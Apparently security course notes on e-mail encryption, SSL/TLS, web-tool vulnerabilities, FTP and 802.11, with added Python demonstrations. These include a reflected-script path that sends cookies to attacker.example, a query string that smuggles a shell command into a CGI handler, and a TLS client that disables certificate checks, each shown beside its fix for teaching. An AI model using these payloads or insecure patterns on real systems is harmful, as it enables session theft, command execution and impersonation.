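The five encryption steps in How Secure E-mail Works and the S/MIME sign-first ordering above, carried out end to end as an added example (this is not code from the slides nor from any PGP or S/MIME implementation). It uses only the Python standard library, so the parts a real implementation takes from a crypto library are stand-ins and are assumptions: textbook RSA without padding for the signature and the key wrap, SHA-256 in counter mode as the symmetric cipher, and SHA-256 as the digest in place of the slides' SHA-1/MD5; the message and key sizes are constructed for the demo.

```python
import hashlib
import secrets
import zlib


def is_probable_prime(n: int, rounds: int = 20) -> bool:
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for small in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % small == 0:
            return n == small
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2            # witness in [2, n-2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits: int) -> int:
    """Random prime of exactly `bits` bits (top bit and low bit forced to 1)."""
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(cand):
            return cand


def rsa_keygen(bits: int = 512):
    """Textbook RSA key pair, returned as ((n, e), (n, d)). No padding: demo only, not for production."""
    e = 65537
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:                      # e is prime, so this means gcd(e, phi) == 1
            return (p * q, e), (p * q, pow(e, -1, phi))


def digest(data: bytes) -> bytes:
    """Message digest. SHA-256 rather than the slides' SHA-1/MD5, both of which have practical collisions."""
    return hashlib.sha256(data).digest()


def rsa_sign(private, data: bytes) -> int:
    """Digital signature: the digest of the data raised to the private exponent."""
    n, d = private
    return pow(int.from_bytes(digest(data), "big"), d, n)


def rsa_verify(public, data: bytes, sig: int) -> bool:
    """Recompute the digest and compare it with the signature raised to the public exponent."""
    n, e = public
    return pow(sig, e, n) == int.from_bytes(digest(data), "big")


def stream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Symmetric stand-in: SHA-256 in counter mode as a keystream (demo only; use AES-GCM in practice)."""
    out = bytearray()
    for off in range(0, len(data), 32):
        ks = hashlib.sha256(key + nonce + (off // 32).to_bytes(8, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[off:off + 32], ks))
    return bytes(out)


def seal(sender_private, recipient_public, message: bytes) -> dict:
    """Sign first, then wrap signature and message in an encrypted digital envelope (the S/MIME order)."""
    sig = rsa_sign(sender_private, message)                       # signature covers the plaintext
    sig_bytes = sig.to_bytes((sig.bit_length() + 7) // 8, "big")
    body = zlib.compress(len(sig_bytes).to_bytes(2, "big") + sig_bytes + message)  # 1. compress
    session_key = secrets.token_bytes(32)                         # 2. fresh session key
    nonce = secrets.token_bytes(16)
    ciphertext = stream_xor(session_key, nonce, body)             # 3. symmetric encryption
    n, e = recipient_public
    wrapped_key = pow(int.from_bytes(session_key, "big"), e, n)  # 4. key wrapped with recipient's public key
    return {"wrapped_key": wrapped_key, "nonce": nonce, "ciphertext": ciphertext}  # 5. bound together


def open_envelope(recipient_private, sender_public, env: dict) -> bytes:
    """Decryption reverses the process; the signature is checked last, on the recovered plaintext."""
    n, d = recipient_private
    try:
        session_key = pow(env["wrapped_key"], d, n).to_bytes(32, "big")
        body = zlib.decompress(stream_xor(session_key, env["nonce"], env["ciphertext"]))
    except (OverflowError, zlib.error) as exc:
        raise ValueError("ciphertext corrupted or wrong recipient key") from exc
    sig_len = int.from_bytes(body[:2], "big")
    sig = int.from_bytes(body[2:2 + sig_len], "big")
    message = body[2 + sig_len:]
    if not rsa_verify(sender_public, message, sig):
        raise ValueError("signature check failed: altered message or wrong sender")
    return message


if __name__ == "__main__":
    alice_pub, alice_priv = rsa_keygen()
    bob_pub, bob_priv = rsa_keygen()
    envelope = seal(alice_priv, bob_pub, b"Wire the funds to account 42.")  # constructed sample message
    print(open_envelope(bob_priv, alice_pub, envelope))
```

Because the signature is computed over the plaintext and then sealed inside the envelope, an eavesdropper sees neither the message nor who signed it, and open_envelope refuses output whose signature does not verify under the claimed sender's key. A production system would use RSA-PSS or Ed25519 signatures, RSA-OAEP or ECDH for the key wrap, and an authenticated cipher such as AES-GCM.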
X.509 Certificates
 Rather than define its own certificate type (as PGP does), S/MIME relies on X.509
 Issued by a certificate authority (CA)
S/MIME Trust Model: Certificate Authorities
 Purely hierarchical model
 Line of trust goes up the chain to a CA, whose business is verifying identity and assuring the validity of keys or certificates
Differences Between PGP and S/MIME

Feature | S/MIME v3 | OpenPGP
Structure of messages | Binary, based on CMS | PGP
Structure of digital certificates | X.509 | PGP
Algorithm: symmetric encryption | 3DES | 3DES
Algorithm: public key encryption (key management) | Diffie-Hellman | ElGamal
Algorithm: digital signature | DSA | DSA
Algorithm: hash | SHA-1 | SHA-1
MIME encapsulation for signed data | Choice of multipart/signed or CMS format | multipart/signed with ASCII armor
MIME encapsulation for encrypted data | application/pkcs7-mime | multipart/encrypted
Trust model | Hierarchical | Web of trust
Marketplace adoption (as of the slides' date) | Growing quickly | Current encryption standard
Marketplace advocates | Microsoft, RSA, VeriSign | Some PGP, Inc. products absorbed into the McAfee line
Ease of use | Configuration not intuitive; must obtain and install certificates; general use straightforward | Configuration not intuitive; must create certificates; general use straightforward
Software | Already integrated in Microsoft and Netscape products | PGP software must be downloaded and installed
Cost of certificates | Must be purchased from a CA; yearly fee | PGP certificates can be generated by anyone; free
Key management | Easy, but you must trust the CA | Harder; user must make decisions on the validity of identities
Compatibility | Transparently works with any vendor's MIME e-mail client, but not compatible with non-MIME e-mail formats | Compatible with MIME and non-MIME e-mail formats, but the recipient must have PGP installed
Centralized management | Possible through PKI | Status is in doubt

Diffie-Hellman and ElGamal are the mandatory key-management (encryption) algorithms of the two specifications, not signature algorithms; both specifications mandate DSA for signatures (RFC 2633 for S/MIME v3, RFC 2440 for OpenPGP).
E-mail Vulnerabilities

Spam
 Act of flooding the Internet with many copies of the same message in an attempt to force the message on people who would not otherwise choose to receive it
 Unrequested junk mail
E-mail Spam
 Targets individual users with direct mail messages
 Creates lists by:
o Scanning Usenet postings
o Stealing Internet mailing lists
o Searching the Web for addresses
 Uses automated tools to subscribe to as many mailing lists as possible

Hoaxes and Chain Letters
 E-mail messages with content designed to get the reader to spread them by:
o Appearing to come from an authority, to exploit trust
o Generating excitement about being involved
o Creating a sense of importance/belonging
o Playing on people's gullibility/greed
 Do not carry a malicious payload, but are usually untrue or already resolved
Costs of Hoaxes and Chain Letters
 Lost productivity
 Damaged reputation
 Relaxed attitude toward legitimate virus warnings
Countermeasures for Hoaxes
 Effective security awareness campaign
 Good e-mail policy
 E-mail content filtering solutions
Guidelines for Hoax Countermeasures
 Create a policy and train users on what to do when they receive a virus warning
 Establish the intranet site as the only authoritative source for advice on virus warnings
 Ensure that the intranet site displays up-to-date virus and hoax information on the home page
 Inform users that if the virus warning is not listed on the intranet site, they should forward it to a designated account
Chapter Summary
 PGP
o Current de facto e-mail encryption standard
o Basis of the OpenPGP standard
 S/MIME
o Emerging standard in e-mail encryption
o Uses X.509 certificates, as do the Microsoft and Netscape browser and e-mail client software
 E-mail vulnerabilities and scams, and how to combat them
o Spam
o Hoaxes and e-mail chain letters
Chapter 6
Web Security
Learning Objectives
 Understand SSL/TLS protocols and their implementation on the Internet
 Understand the HTTPS protocol as it relates to SSL
 Explore common uses of instant messaging applications and identify vulnerabilities associated with those applications
 Understand the vulnerabilities of JavaScript, buffer overflow, ActiveX, cookies, CGI, applets, SMTP relay, and how they are commonly exploited
Secure Sockets Layer (SSL) and Transport Layer Security (TLS)
 Commonly used protocols for managing the security of a message transmission across the insecure Internet

Secure Sockets Layer (SSL)
 Developed by Netscape for transmitting private documents via the Internet
 Uses public key cryptography during the handshake to authenticate the server and agree on a session key; the data transferred over the SSL connection is then encrypted with symmetric ciphers
 URLs that require an SSL connection start with https: instead of http:

Transport Layer Security (TLS)
 The IETF successor to SSL 3.0 (TLS 1.0 is essentially SSL 3.1)
 Not as widely available in browsers when this material was written; today it is the only acceptable choice: SSL 2.0 and 3.0 and TLS 1.0 and 1.1 are deprecated (RFC 6176, RFC 7568, RFC 8996), so TLS 1.2 or 1.3 should be required
SSL/TLS Protocol
 Runs on top of TCP and below higher-level protocols
 Uses TCP/IP on behalf of higher-level protocols
 Allows an SSL-enabled server to authenticate itself to an SSL-enabled client
 Allows the client to authenticate itself to the server (optional client certificates)
 Allows both machines to establish an encrypted connection
Secure Sockets Layer Protocol
SSL/TLS Protocol
 Uses ciphers to enable encryption of data between two parties
 Uses digital certificates to enable authentication of the parties involved in a secure transaction

Cipher Types Used by SSL/TLS
 Asymmetric encryption (public key encryption), for authentication and key exchange
 Symmetric encryption (secret key encryption), for the bulk data
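How the certificate and authentication bullets above translate into client and server settings, as an added example using Python's standard ssl module (not the slides' code nor any vendor's): a client context configured the way many scripts wrongly do it, a hardened client context, a server context that also demands a client certificate, and an audit function that reports the gaps a reviewer would look for. The certificate file names in the comment are assumptions, and no network connection is made.

```python
import ssl


def weak_client_context() -> ssl.SSLContext:
    """The insecure pattern seen in scripts that 'just want it to work': no certificate or name checks."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE     # any certificate is accepted, so an on-path attacker can impersonate the server
    return ctx


def hardened_client_context(cafile=None) -> ssl.SSLContext:
    """Client side: verify the server's certificate chain and name, and refuse deprecated protocol versions."""
    ctx = ssl.create_default_context(cafile=cafile)   # system trust store unless a private CA bundle is given
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2      # SSL 2.0/3.0 and TLS 1.0/1.1 are deprecated
    ctx.check_hostname = True                          # certificate subject must match the host we asked for
    ctx.verify_mode = ssl.CERT_REQUIRED                # no trusted certificate, no connection
    return ctx


def mutual_auth_server_context() -> ssl.SSLContext:
    """Server side that also authenticates the client (the slides' 'client authenticates itself to server')."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.verify_mode = ssl.CERT_REQUIRED                # handshake fails unless the client presents a trusted certificate
    # Before use, load the server's own key pair and the CA that issued client certificates (assumed file names):
    # ctx.load_cert_chain("server.pem", "server.key"); ctx.load_verify_locations("clients-ca.pem")
    return ctx


def audit(ctx: ssl.SSLContext) -> list:
    """Return the findings a reviewer would raise about a context; an empty list means the checks pass."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode: peer certificate not required")
    if ctx.protocol == ssl.PROTOCOL_TLS_CLIENT and not ctx.check_hostname:
        findings.append("check_hostname: disabled, the certificate can belong to anyone")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append(f"minimum_version: {ctx.minimum_version.name} allows deprecated protocol versions")
    return findings


if __name__ == "__main__":
    for name, ctx in (("weak", weak_client_context()), ("hardened", hardened_client_context())):
        print(name, audit(ctx) or "no findings")
```

The audit is what to run against any context a library hands you: verify_mode below CERT_REQUIRED or check_hostname off means the certificate step of the protocol description above is being skipped, and the encryption then protects the session only against passive eavesdroppers, not against anyone who can answer the connection.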
Digital Certificates
 Components
o Certificate user's name
o Entity for whom the certificate is being issued
o Public key of the subject
o Time stamp (validity period)
 Typically issued by a CA that acts as a trusted third party
o Public certificate authorities
o Private certificate authorities

HTTP Secure (HTTPS)
 HTTP carried over an SSL/TLS connection; designed to transfer encrypted information between computers over the World Wide Web (not to be confused with S-HTTP, a separate and now obsolete message-level protocol)
 An implementation of HTTP
 Often used to enable online purchasing or the exchange of private information over insecure networks
 Combines with SSL/TLS to enable secure communication between a client and a server
Instant Messaging (IM)
 Communications service that enables creation of a private chat room with another individual
 Based on client/server architecture
 Typically alerts you whenever someone on your private list is online
 Categorized as enterprise IM or consumer IM systems
 Examples: AOL Instant Messenger, ICQ, NetMessenger, Yahoo! Messenger

IM Security Issues
 Cannot prevent transportation of files that contain viruses and Trojan horses
 Misconfigured file sharing can provide access to sensitive or confidential data
 Lack of encryption
 Could be utilized for transportation of copyrighted material; potential for substantial legal consequences
 Transferring files reveals the network addresses of hosts; could be used for a Denial-of-Service attack
IM Applications
 Do not use well-known TCP ports for communication and file transfers; use registered ports
 Ports can be filtered to restrict certain functionalities or prevent usage altogether

Vulnerabilities of Web Tools
 Security of Web applications and online services is as important as intended functionality
o JavaScript
o ActiveX
o Buffers
o Cookies
o Signed applets
o Common Gateway Interface (CGI)
o Simple Mail Transfer Protocol (SMTP) relay
JavaScript
 Scripting language developed by Netscape to enable Web authors to design interactive sites
 Code is typically embedded into an HTML document and placed between the <script> and </script> tags
 Programs can perform tasks outside the user's control

JavaScript Security Loopholes (browser bugs of the period that let scripts escape the browser's restrictions)
 Monitoring Web browsing
 Reading password and other system files
 Reading the browser's preferences
ActiveX
 Loosely defined set of technologies developed by Microsoft
o Outgrowth of OLE (Object Linking and Embedding) and COM (Component Object Model)
 Provides tools for linking desktop applications to WWW content
 ActiveX controls are native compiled code (often written in Visual Basic or C++) that run with the full privileges of the browser user, not in a sandbox; a malicious or buggy control can compromise the integrity, availability, and confidentiality of the target system

Buffer
 Temporary storage area, usually in RAM
 Acts as a holding area, enabling the CPU to manipulate data before transferring it to a device
Buffer Overflow Attacks
 Triggered by sending more data than the receiving application has reserved for a given field, so that the excess overwrites adjacent memory
 Take advantage of poor application programming that does not check the size of the input against the size of the destination buffer
 Not easy to coordinate; prerequisites:
o Place the necessary code into the program's address space
o Direct the application to read and execute the embedded code through effective manipulation of the registers and memory of the system (typically by overwriting a saved return address)

Cookies
 Small name=value records given to Web browsers by Web servers in a Set-Cookie header
o Browser stores the cookie (in memory or in a file on disk)
o Cookie is sent back to the server, in a Cookie header, each time the browser requests a page from that server
 Verify a user's session
 Designed to enhance the browsing experience
Vulnerabilities of Cookies
 Session cookies are easily stolen, which gives an attacker the user's session without the user's consent
o Attacker convinces the user to follow a malicious hyperlink to the targeted server, which echoes the link's content back unescaped through its error handling (an error handling exploit, EHE); script in the echoed page reads the cookie and sends it to the attacker
o User must be logged on during the time of the attack
 To guard against EHE attacks
o Do not return unescaped data back to the user
o Do not echo 404 file requests back to the user
o Mark session cookies HttpOnly (not readable from script) and Secure (sent only over HTTPS)
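The two guards above, together with the cookie attributes that limit what a stolen reflection can read, as an added example in the Python standard library (not the slides' code). The attack path and session ID are constructed; the HTML strings stand for whatever error page the server would render.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import unquote


def session_cookie_header(session_id: str, secure_site: bool = True) -> str:
    """Set-Cookie value for a session cookie with the attributes that limit theft."""
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True        # document.cookie cannot read it, so reflected script cannot exfiltrate it
    jar["session"]["secure"] = secure_site   # only ever sent over HTTPS
    jar["session"]["samesite"] = "Strict"    # not attached to requests that a third-party page triggers
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


def cookie_readable_by_script(set_cookie_value: str) -> bool:
    """The check to run on a server's Set-Cookie headers: any cookie without HttpOnly is readable by page script."""
    jar = SimpleCookie()
    jar.load(set_cookie_value)
    return any(not morsel["httponly"] for morsel in jar.values())


def not_found_vulnerable(requested_path: str) -> str:
    """Echoes the 404 request unescaped: markup placed in the link's path becomes script in the victim's page."""
    return f"<html><body>404: {unquote(requested_path)} was not found</body></html>"


def not_found_safe(requested_path: str, server_log: list) -> str:
    """Does not echo the request at all; the path goes to the server log, where it can be investigated safely."""
    server_log.append(f"404 {requested_path}")
    return "<html><body>404: the requested page was not found</body></html>"


def reflect_safely(value: str) -> str:
    """When user data must appear in HTML, escape it so markup shows as text instead of being parsed."""
    return html.escape(unquote(value), quote=True)


# Constructed attack link: the path carries script that ships document.cookie to the attacker's host.
ATTACK_PATH = "/%3Cscript%3Enew%20Image().src='http://attacker.example/?c='+document.cookie%3C/script%3E"

if __name__ == "__main__":
    print(session_cookie_header("s3ss10n"))
    print(not_found_vulnerable(ATTACK_PATH))
    print(reflect_safely(ATTACK_PATH))
```

HttpOnly does not stop the reflection itself, only the cookie theft through it; escaping or not echoing the request is what removes the script injection, and both belong in the server's error handler.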
Java Applets
 Internet applications (written in the Java programming language) that can operate on most client hardware and software platforms
 Stored on Web servers, from where they can be downloaded onto clients when first accessed
 With subsequent server access, the applet is already cached on the client and can be executed with no download delay
Signed Applets
 Technique of adding a digital signature to an applet to prove that it came unaltered from a particular trusted source
 Can be given more privileges than ordinary applets
 Unsigned applets are subject to sandbox restrictions
 Browser applets are now obsolete: the Java browser plug-in was dropped from JDK 11 and the Applet API has since been deprecated for removal
Unsigned Applets
Sandbox Model
 Prevents the applet from:
o Reading or writing files and performing other operations on local system resources
o Connecting to any Web site except the site from which the applet was loaded
o Accessing the client's local printer
o Accessing the client's system clipboard and properties
Signed Applets
Reasons for Using Code Signing Features
 To release the application from sandbox restrictions imposed on unsigned code
 To provide confirmation regarding the source of the application's code

Common Gateway Interface (CGI)
 Interface specification that allows communication between client programs and Web servers that understand HTTP
 Uses TCP/IP
 Can be written in any programming language
 Parts of a CGI script
o Executable program on the server (the script itself)
o HTML page that feeds input to the executable
Typical Form Submission
CGI
 Interactive nature leads to security loopholes
o Allowing input from other systems to a program that runs on a local server exposes the system to potential security hazards
Precautions to Take When Running Scripts on a Server
 Deploy IDS, access list filtering, and screening on the border of the network
 Design and code applications to check the size and content of input received from clients
 Create different user groups with different permissions; restrict access to the hierarchical file system based on those groups
 Validate the security of a prewritten script before deploying it in your production environment
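The second precaution above (check the size and content of client input) and the loophole it closes, as an added example in Python (not the slides' code). Both handlers pass a client-supplied host name to a command; echo stands in for the real tool so the example runs offline, and the query strings are constructed.

```python
import re
import subprocess
from urllib.parse import parse_qs

MAX_QUERY_LEN = 1024
MAX_FIELD_LEN = 64
# Allowlist for a host name: letters, digits, hyphens and dots, no leading hyphen, no shell metacharacters.
HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


class BadInput(ValueError):
    """Raised when a request fails a size or content check; the caller answers 400 and runs nothing."""


def parse_query(query_string: str) -> dict:
    """Size checks first: total length, number of fields, and per-field length, before any value is used."""
    if len(query_string) > MAX_QUERY_LEN:
        raise BadInput("query string too long")
    fields = parse_qs(query_string, keep_blank_values=True, max_num_fields=16)
    clean = {}
    for name, values in fields.items():
        if len(values) != 1:
            raise BadInput(f"field {name!r} repeated")
        if len(values[0]) > MAX_FIELD_LEN:
            raise BadInput(f"field {name!r} too long")
        clean[name] = values[0]
    return clean


def ping_vulnerable(query_string: str) -> str:
    """The classic CGI hole: the value is pasted into a shell command line, so ';' starts a second command."""
    host = parse_qs(query_string).get("host", [""])[0]
    result = subprocess.run(f"echo pinging {host}", shell=True, capture_output=True, text=True)
    return result.stdout


def ping_hardened(query_string: str) -> str:
    """Content check against the allowlist, then the value travels as one argv element with no shell involved."""
    host = parse_query(query_string).get("host", "")
    if not HOST_RE.fullmatch(host):
        raise BadInput("host contains characters outside the allowed set")
    result = subprocess.run(["echo", "pinging", host], shell=False, capture_output=True, text=True)
    return result.stdout


# Constructed requests: a normal one and one carrying an injected command.
NORMAL_QUERY = "host=example.com"
INJECTED_QUERY = "host=example.com%3B+echo+INJECTED"

if __name__ == "__main__":
    print(ping_vulnerable(INJECTED_QUERY))   # second line of output proves the injected command ran
    try:
        ping_hardened(INJECTED_QUERY)
    except BadInput as exc:
        print("rejected:", exc)
```

The order matters: length limits run before the value is parsed or matched (an oversized field never reaches the regex or the command), and the allowlist is positive (what a host name may contain) rather than a denylist of shell characters that an attacker can find a way around.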
Simple Mail Transfer Protocol (SMTP)
 Standard Internet protocol for global e-mail communications
 Transaction takes place between two SMTP servers
 Designed as a simple protocol
o Easy to understand and troubleshoot
o Easily exploited by malicious users
Vulnerabilities of SMTP Relay
 Spam via an open SMTP relay (a server that accepts mail from any source for any destination) can lead to:
o Loss of bandwidth
o Hijacked mail servers that may no longer be able to serve their legitimate purpose
 Mail servers of innocent organizations can be subject to blacklisting
 Countermeasure: relay only for authenticated clients or trusted internal networks, and accept unauthenticated mail only when it is addressed to your own domains
Chapter Summary
 Protocols commonly implemented for secure message transmissions
o Secure Sockets Layer
o Transport Layer Security
 Data encryption across the Internet through HTTPS in relation to SSL/TLS
Chapter Summary
 Instant Messaging
o Common uses
o Vulnerabilities
 Well-known vulnerabilities associated with web development tools
Chapter 7
Directory and File Transfer Services
Learning Objectives
 Explain the benefits offered by centralized enterprise directory services such as LDAP over traditional authentication systems
 Identify major vulnerabilities of the FTP method of exchanging data
 Describe S/FTP (SFTP, file transfer over SSH), the major alternative to using FTP, in order to better secure your network infrastructure
 Illustrate the threat posed to your network by unmonitored file shares
Directory Services
 Network services that uniquely identify users and can be used to authenticate and authorize them to use network resources
 Allow users to look up username or resource information, just as DNS does

Lightweight Directory Access Protocol (LDAP)
 Accesses directory data based on ISO's X.500 standard, but includes TCP/IP support and a simplified client design
 Exchanges directory information with clients (it is a protocol, not the database that stores the information)
 Allows users to search using a broad set of criteria (name, type of service, location)
LDAP
 Provides additional features including authentication and authorization
o Each person uses only one username and password regardless of client software and OS
 Key feature and benefit
o Versatile directory system that is standards based and platform independent
Major LDAP Products
Common Applications of LDAP
 Single sign-on (SSO)
 User administration
 Public key infrastructure (PKI)
LDAP Operations
LDAP Framework
 Directory Information Tree (DIT)
o Data structure that actually contains directory information about network users and services
o Hierarchical structure
Directory Information Tree
LDAP Framework
 DN (distinguished name) example, read from the entry up to the root of the tree
o cn=Jonathan Q Public
o ou=Information Security Department
o o=XYZ Corp.
o c=US (the c attribute holds an ISO 3166 two-letter country code)
 Written on one line as: cn=Jonathan Q Public,ou=Information Security Department,o=XYZ Corp.,c=US

LDAP Security Benefits
 Authentication
o Ensures users' identities
o Three levels
 No authentication (anonymous bind)
 Simple authentication (a DN and password, sent in the clear unless the connection is protected by TLS)
 Simple Authentication and Security Layer (SASL), which can carry stronger mechanisms such as Kerberos
 Authorization
o Determines the network resources the user may access
o Determined by access control lists (ACLs)
 Encryption
o Provided through SASL security layers or by running LDAP over TLS (LDAPS on port 636, or StartTLS on port 389)
LDAP Security Vulnerabilities
 Denial of service
 Man in the middle (an unprotected simple bind hands the password to anyone on the path)
 Attacks against data confidentiality
File Transfer Services
 Ability to share programs and data around the world is an essential aspect of the Internet
 Critical to today's networked organizations
File Transfer Protocol (FTP)
 Commonly used but very insecure
 Two standard data transmission methods: active FTP and passive FTP
o In both, the client initiates a TCP session using destination port 21 (command connection)
o Differences are in the data connection that is set up when the user wants to transfer data between two machines
Setup of FTP Control Connection
Active FTP
 FTP's default connection
 The client sends a PORT command naming its address and a high port; the FTP server then creates the data connection by opening a TCP session from source port 20 to that destination port greater than 1023 (contrary to TCP's normal client-to-server operation), so the client's firewall must accept an inbound connection
Setup of theActive FTP Data Connection
Passive FTP
 Not supported by all FTP implementations
 The client sends PASV; the server replies with an address and port, and the client initiates the data connection to the server with a source and destination port that are both random high ports
Setup of thePassive FTP Data Connection
FTP Security Issues
 Bounce attack (a PORT command naming a third party's address makes the server connect to, and scan or relay data to, that third party)
 Clear text authentication and data transmission
 Glob vulnerability (wildcard expansion of crafted patterns exhausting memory or overflowing buffers in the server)
 Software exploits and buffer overflow vulnerabilities
 Anonymous FTP and blind FTP access
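The active/passive difference and the bounce attack above, as an added example in Python (not the slides' code and not taken from any FTP server): it parses the PASV reply and the PORT command that carry the data-connection endpoints, derives the firewall rule each mode needs, and applies the server-side check that defeats bounce attacks. Addresses and replies are constructed.

```python
import re

SIX_NUMBERS = re.compile(r"(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})")


def _decode(h1, h2, h3, h4, p1, p2):
    """FTP spells an endpoint as four address octets and two port bytes (port = p1 * 256 + p2)."""
    return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2


def parse_pasv_reply(reply: str):
    """Passive mode: '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' tells the client where to connect."""
    m = SIX_NUMBERS.search(reply)
    if not reply.startswith("227") or not m:
        raise ValueError("not a PASV reply")
    return _decode(*map(int, m.groups()))


def build_port_command(client_ip: str, client_port: int) -> str:
    """Active mode: the client names the address and high port the server must connect back to from port 20."""
    if not 1023 < client_port < 65536:
        raise ValueError("data port must be an unprivileged port")
    return "PORT " + ",".join(client_ip.split(".") + [str(client_port // 256), str(client_port % 256)])


def parse_port_command(cmd: str):
    m = re.fullmatch(r"PORT\s+" + SIX_NUMBERS.pattern, cmd.strip())
    if not m:
        raise ValueError("malformed PORT command")
    return _decode(*map(int, m.groups()))


def accept_port_command(cmd: str, control_peer_ip: str) -> bool:
    """Server-side bounce-attack check: the data target must be the client that owns the control connection,
    on an unprivileged port, so the server cannot be pointed at a third party's mail, web or other service."""
    host, port = parse_port_command(cmd)
    return host == control_peer_ip and port > 1023


def data_connection_rule(mode: str, client_ip: str, server_ip: str, data_port: int) -> dict:
    """Who opens the data connection in each mode, and therefore which firewall has to permit an inbound flow."""
    if mode == "active":
        return {"initiator": "server", "src": (server_ip, 20), "dst": (client_ip, data_port),
                "inbound_on": "client firewall (server port 20 to a high client port)"}
    if mode == "passive":
        return {"initiator": "client", "src": (client_ip, "high"), "dst": (server_ip, data_port),
                "inbound_on": "server firewall (the passive port range the server advertises)"}
    raise ValueError("mode must be 'active' or 'passive'")


if __name__ == "__main__":
    print(parse_pasv_reply("227 Entering Passive Mode (192,168,1,10,19,137)."))
    print(build_port_command("10.0.0.5", 5001))
    print(accept_port_command("PORT 10,0,0,99,0,25", "10.0.0.5"))   # bounce attempt at a mail server: False
```

The data_connection_rule output is why active FTP fails through client-side NAT and passive FTP needs a fixed, published port range on the server: in each mode one side must accept an inbound connection that a stateless filter cannot predict from the control session alone.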
FTP Countermeasures
 Do not allow anonymous access unless a clear business requirement exists
 Employ a state-of-the-art firewall
 Ensure that the server has the latest security patches and has been properly configured to limit user access
 Encrypt data before placing it on the FTP server
FTP Countermeasures
 Encrypt the FTP data flow using a VPN connection
 Switch to a secure alternative

Secure File Transfers
 Secure File Transfer Protocol (S/FTP, usually written SFTP: the SSH File Transfer Protocol)
o Replacement for FTP that uses SSH version 2 as a secure framework for encrypting data transfers
o Not to be confused with FTPS, which is the original FTP protocol wrapped in SSL/TLS
Benefits of S/FTP over FTP
 Offers strong authentication using a variety of methods including X.509 certificates
 Encrypts authentication, commands, and all data transferred between client and server using secure encryption algorithms
 Easy to configure a firewall to permit S/FTP communications (uses a single, well-behaved TCP connection)
 Requires no negotiation to open a second connection
SecureFTP Implementation Programs
File Sharing
 Originally intended to share files on a LAN
 Easy to set up
 Uses the Windows graphical interface
 Can be configured as peer-to-peer or as client/server shares
File Sharing Risks
 Confidentiality of data
 Some viruses spread via network shares
 Other types of critical information besides user documentation could become compromised if file shares are misconfigured

Protecting Your File Shares
 Define and communicate a policy
 Conduct audits of file shares using commercial scanning and audit tools
Chapter Summary
 Key resources used to support mission-critical business applications
o Directory services
 LDAP
o File transfer mechanisms
 FTP
 S/FTP
Chapter 8
Wireless and Instant Messaging
Learning Objectives
 Understand security issues related to wireless data transfer
 Understand the 802.11x standards
 Understand Wireless Application Protocol (WAP) and how it works
 Understand the Wireless Transport Layer Security (WTLS) protocol and how it works
 Understand Wired Equivalent Privacy (WEP) and how it works
 Conduct a wireless site survey
 Understand instant messaging
802.11
 IEEE group responsible for defining the interface between wireless clients and their network access points in wireless LANs
 First standard, finalized in 1997, defined three types of transmission at the Physical layer
o Diffused infrared - based on infrared transmissions
o Direct sequence spread spectrum (DSSS) - radio-based
o Frequency hopping spread spectrum (FHSS) - radio-based
802.11
 Established WEP as an optional security protocol
 Specified use of the 2.4 GHz industrial, scientific, and medical (ISM) radio band
 Mandated a 1 Mbps data transfer rate and an optional 2 Mbps data transfer rate
 Most prominent working groups: 802.11b, 802.11a, 802.11i, and 802.11g

802.11a
 High-Speed Physical Layer in the 5 GHz Band
 Sets specifications for wireless data transmission of up to 54 Mbps in the 5 GHz band
 Uses an orthogonal frequency division multiplexing (OFDM) encoding scheme rather than FHSS or DSSS
 Approved in 1999
802.11b
 Higher-Speed Layer Extension in the 2.4 GHz Band
 Establishes specifications for data transmission that provides 11 Mbps transmission (with fallback to 5.5, 2, and 1 Mbps) in the 2.4 GHz band
 Sometimes referred to as Wi-Fi when associated with WECA certified devices
 Uses only DSSS
 Approved in 1999

802.11c
 Worked to establish MAC bridging functionality for 802.11
 Folded into the 802.1D standard for MAC bridging
802.11d
 Responsible for determining the requirements necessary for 802.11 to operate in other countries
 Continuing (status as of the slides' date)

802.11e
 Responsible for creating a standard that will add multimedia and quality of service (QoS) capabilities to the wireless MAC layer and therefore guarantee specified data transmission rates and error percentages
 Proposal in draft form (status as of the slides' date)
802.11f
 Responsible for creating a standard that will allow for better roaming between multivendor access points and distribution systems
 Ongoing (status as of the slides' date)

802.11g
 Responsible for providing raw data throughput over wireless networks at a throughput rate of 22 Mbps or more
 Draft created in January 2002; final approval expected in late 2002 or early 2003
802.11h
 Responsible for providing a way to allow for European implementation requests regarding the 5 GHz band
 Requirements
o Limits a PC card from emitting more radio signal than needed
o Allows devices to listen to radio wave activity before picking a channel on which to broadcast
 Ongoing; not yet approved (status as of the slides' date)

802.11i
 Responsible for fixing the security flaws in WEP and integrating 802.1X authentication
 Hopes to eliminate WEP altogether and replace it with Temporal Key Integrity Protocol (TKIP), which would require replacement of keys within a certain amount of time
 Ongoing; not yet approved when these slides were written (ratified in 2004; its AES-based CCMP mode is what WPA2 requires, and TKIP itself is now deprecated)
802.11j
 Worked to create a global standard in the 5 GHz band by making high-performance LAN (HiperLAN) and 802.11a interoperable
